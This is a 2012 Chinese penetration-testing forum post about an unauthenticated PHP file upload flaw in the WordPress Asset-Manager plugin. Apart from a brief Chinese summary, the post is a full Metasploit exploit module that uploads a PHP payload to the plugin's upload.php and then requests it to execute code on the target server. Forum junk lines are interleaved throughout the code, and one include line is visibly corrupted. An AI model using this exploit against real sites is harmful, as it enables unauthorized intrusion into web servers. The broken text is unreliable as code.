中国网络渗透测试联盟
标题:
WordPress Asset-Manager PHP文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:22
标题:
WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
4 T+ Y) t: N! u5 r" V* L* u
- I* X, p6 G3 q9 i" i
##
6 R$ d! D3 B1 ^+ {! L& J
# This file is part of the Metasploit Framework and may be subject to
7 B" s5 ~6 P# f/ F! W
# redistribution and commercial restrictions. Please see the Metasploit
& }; W" b9 e5 a; ?7 M) l* j ~
# Framework web site for more information on licensing and terms of use.
+ S3 h) d! \% W% E2 i" c! k
#
http://metasploit.com/framework/
# o" d0 k; d6 [( y2 l7 S
##
* m+ n" M8 x" N% Y
' n d+ e( l l8 v9 l
require 'msf/core'
: j; ]9 ^" z* q4 ^4 o! x6 p
require 'msf/core/exploit/php_exe'
& p; k/ l4 {% q/ S' S6 C
4 M, K. s4 Y6 x% X/ n/ o
class Metasploit3 < Msf::Exploit::Remote
6 M" [# Y% F6 W" ?
Rank = ExcellentRanking
: ^" p. L! w' `( P4 d2 N; t3 u
7 Y6 b- l8 T: v
include Msf::Exploit::Remote::HttpClient
8 v+ i0 {5 o: u2 Z2 J( e0 [
include Msf::Exploit:
hpEXE
5 P( K" U5 s8 m A8 ~0 {
6 v2 | m2 e o5 P0 d
def initialize(info = {})
* N. F" i2 [4 n/ x( Q7 l/ U; u: I
super(update_info(info,
; O- ]+ U% T: N7 I. s% ?5 h
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
9 H3 i; n- A. N0 _6 C2 |
'Description' => %q{
. R, F' f4 t# S8 T" K/ k1 V
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
* X) i+ k W2 a; r
plugin. By abusing the upload.php file, a malicious user can upload a file to a
) y# [' I7 E& s0 j5 d
temp directory without authentication, which results in arbitrary code execution.
c* y6 X X8 x. U
},
" `) _8 v5 C. i
'Author' =>
9 W; u- ?6 [' y7 P
[
" p4 b+ C4 F2 @+ h2 T1 @' o8 _5 u5 o
'Sammy FORGIT', # initial discovery
! s: p& s- L- I7 ]5 A: _* a9 G
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
: f8 @; H) l: A& @
],
1 _6 Q3 S% M3 M! o
'License' => MSF_LICENSE,
1 H# m+ B; ~0 a$ X* l' a
'References' =>
$ a% j+ Q6 K$ E3 X3 u! ]2 j
[
! p2 [7 G: z# I, T( d9 Q3 m
[ 'OSVDB', '82653' ],
3 s! e+ a* U: E8 [
[ 'BID', '53809' ],
+ f0 N( t$ g$ g5 P, p) q- n
[ 'EDB', '18993' ],
' m5 W' W3 U1 R4 P
[ 'URL', 'http://
www.myhack58.com
/' ]
, A3 t' i; W; d& f+ J5 ~6 r9 l( w$ x
],
$ \* o+ H y6 G* T
'Payload' =>
2 f6 U4 _7 v! H' l3 b5 g" }' |* x
{
6 Q' d: W9 {/ B4 x; i {
'BadChars' => "\x00",
/ M' \- f/ s% n2 F5 \- w" g$ a
},
/ i0 t8 j8 G; o
'Platform' => 'php',
3 L8 [. O O4 O! U6 F# S
'Arch' => ARCH_PHP,
" n+ S: ?& h& z. j0 C! v) G. ?: l
'Targets' =>
2 }, L& {3 ?. o1 X+ r; a
[
8 I8 o9 J# x) c: a1 x+ h
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
2 V- \2 `& n/ U. B. F
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
N1 i' _) i! I9 ~4 [) \
],
+ r. V, x2 }4 O+ o% d
'DefaultTarget' => 0,
0 S' w9 X; D @4 [& m
'DisclosureDate' => 'May 26 2012'))
6 n* u' L* q* M6 k8 @
. [2 N% Y1 w' t' [* d
register_options(
+ `; n& q; ~: {9 u7 r) k
[
6 O* g* U$ K! L
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. {: F% s+ T5 c+ {/ ?+ S" y( M" S
], self.class)
$ {0 Y. ^8 }/ ^+ z6 b' ]/ o
end
V4 k5 {0 d' L
1 k" s8 T/ J$ ]$ u3 n- z7 u
def exploit
5 [1 [ i) D }2 E* W6 p
uri = target_uri.path
1 w" C5 ]6 x7 h- `' b( y
uri << '/' if uri[-1,1] != '/'
4 d8 H3 W% U/ U0 U5 z$ A. W
peer = "#{rhost}:#{rport}"
1 Y( ]4 p9 l) i5 B' w) S
payload_name = "#{rand_text_alpha(5)}.php"
: n: I4 p# w' w5 `6 ?2 _4 X" ]; i) }
php_payload = get_write_exec_payload(:unlink_self=>true)
3 i- `5 b- @8 J+ |# j4 o- ]* w
. r* m* ~: x) q a5 J
data = Rex::MIME::Message.new
2 C5 H! M4 Z. a ?+ m$ X
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
. V0 d4 v% y7 j* U$ s
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+ b' P8 `% W! k {! ~
8 T9 Y" @8 ~& ?" z+ N
print_status("#{peer} - Uploading payload #{payload_name}")
7 L* W" P) Z2 Q- I. W; \: V, O1 W6 f
res = send_request_cgi({
& h8 D# _8 l r" o
'method' => 'POST',
2 I. _& @, p+ Z4 O; d0 m+ A% t
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ M% A2 F6 N5 h5 U8 Z
'ctype' => "multipart/form-data; boundary=#{data.bound}",
8 b: Z- S* {! M; i8 M! _
'data' => post_data
: {" I+ x% i8 B8 o, E
})
. [% W" T. {" b/ Q8 e2 ?% [
; w1 f x3 L( x0 d. s
if not res or res.code != 200 or res.body !~ /#{payload_name}/
; ^- o6 `% ^4 {3 H& a4 W7 B5 g
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
" ~1 [" m2 w& |9 Y
end
2 |4 h( n( S A% y3 ?
8 C$ g# _' l3 K9 ^% R8 Y9 B* L
print_status("#{peer} - Executing payload #{payload_name}")
! c3 r. Q1 X: D% s7 r% Z: D/ ]% |
res = send_request_raw({
" k# ]7 V4 L7 i8 A# ^$ X
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
f7 N- c# [. ^1 s+ a) Q
'method' => 'GET'
2 k" ]! l( D; r8 F
})
M% K ?' S5 Y/ a
' _* u" L8 h$ M6 i& e" s
if res and res.code != 200
( v" i7 v, P8 W% \8 _ _* @* l& Y
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
1 x1 H, X6 r2 r& O3 I
end
$ v, t1 ^. _- K. w! S0 F. \
end
Z/ x5 x: C$ E" g/ F Y/ Q
end
/ y. R" X( N b0 z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2